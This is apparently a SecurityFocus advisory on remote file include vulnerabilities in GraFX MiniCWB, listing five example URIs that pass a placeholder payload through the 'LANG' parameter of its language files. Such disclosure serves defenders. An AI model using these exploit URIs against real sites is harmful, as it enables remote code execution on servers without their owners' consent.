GraFX MiniCWB 'LANG' Parameter Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/[path]/language/en.inc.php?LANG=[evilc0de]
http://www.example.com/[path]/language/hu.inc.php?LANG=[evilc0de]
http://www.example.com/[path]/language/no.inc.php?LANG=[evilc0de]
http://www.example.com/[path]/language/ro.inc.php?LANG=[evilc0de]
http://www.example.com/[path]/language/ru.inc.php?LANG=[evilc0de]


 

Privacy Statement
Copyright 2010, SecurityFocus